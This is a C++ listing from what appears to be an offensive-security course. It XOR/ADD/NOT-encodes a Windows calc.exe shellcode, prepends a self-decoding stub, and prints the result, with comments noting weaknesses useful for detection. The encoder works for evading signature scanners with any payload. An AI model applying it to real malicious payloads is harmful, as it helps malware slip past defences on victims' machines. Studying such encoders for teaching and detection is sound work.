Example C++ shellcode decoder stub using XOR, NOT, ADD operations to obfuscate and encode a calculator payload.
// White Knight Labs
// Offensive Development Course - Shellcode Decoder Stub
// Author: Stigs
#include <iostream>
#include <vector>
#include <iomanip>
#include <random>
/// @brief Encodes every byte of @p data in place with a keyed, byte-wise transform.
///
/// Each byte b becomes the low 8 bits of ~((b ^ randomXorValue) + 1): XOR with
/// the key, add one, then bitwise NOT. The transform is its own small inverse
/// chain (NOT, subtract one, XOR with the same key), so it hides the bytes
/// from naive pattern matching but provides no confidentiality: the key is a
/// single byte and every position is encoded independently.
///
/// @param data            Buffer to transform; modified in place. An empty
///                        buffer is left untouched.
/// @param randomXorValue  One-byte key used for the XOR step.
void obfuscateBytes(std::vector<char>& data, unsigned char randomXorValue) {
    for (auto it = data.begin(); it != data.end(); ++it) {
        // Work on the unsigned value so the arithmetic is plainly modulo 256;
        // only the low 8 bits survive the conversion back to char.
        const unsigned int mixed = (static_cast<unsigned char>(*it) ^ randomXorValue) + 1u;
        *it = static_cast<char>(~mixed);
    }
}
// Builds one encoded blob and prints it as a "\xNN" escape string:
//   1. draw a one-byte key,
//   2. encode the embedded payload bytes with obfuscateBytes(),
//   3. prepend a fixed decoder stub carrying the payload length and the key.
//
// Analyst / detection notes (from what this listing shows):
//   * The key is a single byte and the transform is byte-wise, so a given
//     payload has at most 256 encoded forms.
//   * Every stub byte is constant across runs except the four length bytes
//     and the one key byte, so the stub can be matched with a wildcarded
//     byte signature.
//   * NOTE(review): the stub contains a load (0x8a 0x04 0x37) and a store
//     (0x88 0x04 0x37) on the same operand, which indicates it rewrites the
//     appended bytes in place; running it would then need memory that is both
//     writable and executable. Confirm against a disassembly.
int main() {
    // Seed a Mersenne Twister from std::random_device and draw the key
    // uniformly from 0x00..0xFF.
    std::random_device entropySource;
    std::mt19937 engine(entropySource());
    std::uniform_int_distribution<> keyRange(0, 0xFF);
    unsigned char xorKey = static_cast<unsigned char>(keyRange(engine));

    // Shellcode Link - Calc - https://www.exploit-db.com/exploits/51634
    std::vector<char> payload = {
        '\x48', '\x31', '\xd2', '\x65', '\x48', '\x8b', '\x42', '\x60', '\x48', '\x8b', '\x70', '\x18', '\x48', '\x8b', '\x76', '\x20',
        '\x4c', '\x8b', '\x0e', '\x4d', '\x8b', '\x09', '\x4d', '\x8b', '\x49', '\x20', '\xeb', '\x63', '\x41', '\x8b', '\x49', '\x3c',
        '\x4d', '\x31', '\xff', '\x41', '\xb7', '\x88', '\x4d', '\x01', '\xcf', '\x49', '\x01', '\xcf', '\x45', '\x8b', '\x3f', '\x4d',
        '\x01', '\xcf', '\x41', '\x8b', '\x4f', '\x18', '\x45', '\x8b', '\x77', '\x20', '\x4d', '\x01', '\xce', '\xe3', '\x3f', '\xff',
        '\xc9', '\x48', '\x31', '\xf6', '\x41', '\x8b', '\x34', '\x8e', '\x4c', '\x01', '\xce', '\x48', '\x31', '\xc0', '\x48', '\x31',
        '\xd2', '\xfc', '\xac', '\x84', '\xc0', '\x74', '\x07', '\xc1', '\xca', '\x0d', '\x01', '\xc2', '\xeb', '\xf4', '\x44', '\x39',
        '\xc2', '\x75', '\xda', '\x45', '\x8b', '\x57', '\x24', '\x4d', '\x01', '\xca', '\x41', '\x0f', '\xb7', '\x0c', '\x4a', '\x45',
        '\x8b', '\x5f', '\x1c', '\x4d', '\x01', '\xcb', '\x41', '\x8b', '\x04', '\x8b', '\x4c', '\x01', '\xc8', '\xc3', '\xc3', '\x41',
        '\xb8', '\x98', '\xfe', '\x8a', '\x0e', '\xe8', '\x92', '\xff', '\xff', '\xff', '\x48', '\x31', '\xc9', '\x51', '\x48', '\xb9',
        '\x63', '\x61', '\x6c', '\x63', '\x2e', '\x65', '\x78', '\x65', '\x51', '\x48', '\x8d', '\x0c', '\x24', '\x48', '\x31', '\xd2',
        '\x48', '\xff', '\xc2', '\x48', '\x83', '\xec', '\x28', '\xff', '\xd0'
    };

    // Encode the payload in place with this run's key.
    obfuscateBytes(payload, xorKey);

    // The stub embeds the payload length, so capture it before assembling.
    size_t payloadLen = payload.size();

    std::vector<char> decoderStub = {
        // '\xcc', // INT 3 - Breakpoint - Uncomment if needed
        // 0xBE is the opcode for "mov esi, imm32"; the next four bytes are
        // the payload length as a little-endian 32-bit immediate.
        '\xbe',
        static_cast<char>(payloadLen & 0xFF),          // least significant byte
        static_cast<char>((payloadLen >> 8) & 0xFF),
        static_cast<char>((payloadLen >> 16) & 0xFF),
        static_cast<char>((payloadLen >> 24) & 0xFF),  // most significant byte
        // Fixed decode-loop bytes; the only run-dependent byte below is the
        // key, placed as the operand that follows 0x34.
        '\x48', '\x8d', '\x3d', '\x16', '\x00', '\x00', '\x00',
        '\x48', '\x85', '\xf6', '\x74', '\x11',
        '\x48', '\xff', '\xce', '\x8a', '\x04', '\x37', '\xf6',
        '\xd0', '\xfe', '\xc8', '\x34', static_cast<char>(xorKey), '\x88', '\x04',
        '\x37', '\xeb', '\xea',
    };

    // Output layout: stub bytes first, encoded payload bytes directly after.
    std::vector<char> blob;
    blob.reserve(decoderStub.size() + payload.size());
    blob.insert(blob.end(), decoderStub.begin(), decoderStub.end());
    blob.insert(blob.end(), payload.begin(), payload.end());

    // Emit the blob as two-digit, zero-padded lowercase hex escapes.
    std::cout << "Obfuscated Shellcode with Decoder Stub: ";
    std::cout << std::hex << std::setfill('0');
    for (auto it = blob.begin(); it != blob.end(); ++it) {
        // setw is not sticky, so it is re-applied immediately before each value.
        const unsigned int value = static_cast<unsigned char>(*it);
        std::cout << "\\x" << std::setw(2) << value;
    }
    std::cout << std::endl;
    return 0;
}